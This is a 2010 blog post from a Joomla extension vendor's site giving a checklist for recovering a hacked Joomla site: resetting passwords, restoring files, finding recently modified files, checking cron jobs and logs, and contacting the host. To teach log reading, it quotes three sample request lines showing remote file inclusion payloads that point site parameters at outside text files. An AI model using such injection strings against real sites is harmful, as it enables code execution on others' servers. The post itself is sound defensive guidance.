Store

Joomla Components Joomla Plugins Php Scripts WordPress Plugins

List All Products
Download Area
Show Cart
Your Cart is currently empty.
   

Product Latest Version

Jobs Pro
 Jobs! ProJobs! ProJobs! Pro
Jobs! Pro
1.7
Jobs Basic
 Jobs! Basic
1.0.13
Jobs! WP
 Jobs! WP
1.1
lknSupport
1.1

Login Form






Your Joomla! is Hacked. Now What?

| 10 March 2010
Posted in Tips and Tricks

I've blogged about 'Joomla Security Tips' . You can think that this blog post is the continuation of that blog post. I'm going to write based on 'Your Joomla! site is hacked. Now What?' question. You can add your own ideas or fix our mistakes

Lets start now.

  1. Change All Passwords: I think the changing all passwords related (Joomla Admin Panel, Ftp passwords, your hosting panel passwords like cpanel, database users,shell access)
  2. Delete All Files Under Root Directory and Related Database Records: I think the best way to make sure that all potential vulnerability in that site is removed from your Joomla! is deleting all files under public_html and deleting the related database records.A Script kiddy who is only trying to mark your index page will mostly attack your index file. But professional attackers are usually very interested in your database records like passwords etc. If you do not want to apply this step, We suggest you to visit this JED category External link . Back up your web site
  3. List Recently Modifed or Created Files: Before you make any change on your web site (like deleting the file under public_html or using your backup), I think it's better to create a list of recently modified or created files . If you have ssh , find . -type f -mtime -20 will give the list of files which are created / modified in last 20 days (You can find php script scripts which does the same with searching google). When you get the list, Check the list to identify new files that don't belong Joomla!
  4. Cron Jobs: Do not forget to check the scripts which are used for your cron jobs
  5. Control Your Raw Logs: I also suggest you to check your raw logs to detect how your web site is hacked. When you start to check your raw logs, You may see the lines like
    • 192.168.0.1 - - [29/Oct/2008:06:07:30 -0500] "GET /index.php?live_site=test.org/1.txt?? HTTP/1.1" 200 10864 "-" "Firefox"
    • 192.168.0.1 - - [29/Oct/2008:06:07:30 -0500] "GET /index.php?_SERVER[DOCUMENT_ROOT]=http://www.test.com/id1.txt? HTTP/1.1" 200 10864 "-" "Firefox"
    • 192.168.0.1 - - [29/Oct/2008:06:07:30 -0500] "GET /components/com_XXX/file.php?live_site=test.org/1.txt?? HTTP/1.1" 200 10864 "-" "Firefox"
      • 192.168.0.1 is the IP of attacker
      • 29/Oct/2008:06:07:30 is the attacking date
      • /components/com_XXX/file.php is file which is attacked. It's a file for XXX component . Make sure that you are using the latest version of XXX component
  6. Inform Your Hosting Company : When you have discovered (or If you have discovered) the attacking reason, Write an e-mail or ticket to your hosting company
  7. Continue to Watch Your Web Site: The attackers may return back to your web site again
What do you think about the after hacking list?